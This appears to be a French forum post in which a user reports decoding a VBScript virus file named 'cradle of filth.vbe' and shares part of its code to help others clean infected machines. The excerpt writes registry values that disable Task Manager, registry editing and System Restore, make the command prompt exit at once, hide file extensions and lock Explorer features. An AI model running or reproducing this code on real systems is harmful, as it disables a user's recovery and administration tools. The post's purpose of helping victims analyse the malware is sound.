J'ai trouvé le virus en question, le fichier etait cradle of filth.vbe, apres decrytpion avec le srcdec18, voila une partie du code que je pense utile pour les qui veulent aider
Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"
icone = Shells.RegRead ("HKCR\Directory\DefaultIcon\">
Shells.RegWrite "HKCR\VBEfile\DefaultIcon\",icone,"REG_EXPAND_SZ"
Shells.RegWrite "HKLM\SOFTWARE\Microsoft\Command Processor\EnableExtensions",1,"REG_DWORD" Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoChangeStartMenu",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoComputersNearMe",1,"REG_DWORD" Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrive",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoHardwareTab",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoResolveSearch",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoShellSearchButton",1,"REG_DWORD"
Shells.RegWrite "HKLM\Software\Microsoft\Command Processor\AutoRun","exit","REG_SZ"
Shells.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR",1,"REG_DWORD"
Shells.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt\UncheckedValue",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
Shells.RegWrite "HKCU\Control Panel\Mouse\DoubleClickSpeed",4000,"REG_SZ"
Shells.RegWrite "HKCU\Control Panel\Mouse\MouseSpeed",10,"REG_SZ"
Set f = Fso.CreateTextFile("C:\Windows\Desktop.ini", True)
f.WriteLine "[.ShellClassInfo]"
f.WriteLine "Clsid={645FF040-5081-101B-9F08-00AA002F954E}"
f.Close
Set f1 = Fso.GetFolder("C:\Windows")
f1.Attributes = 4
f1.Close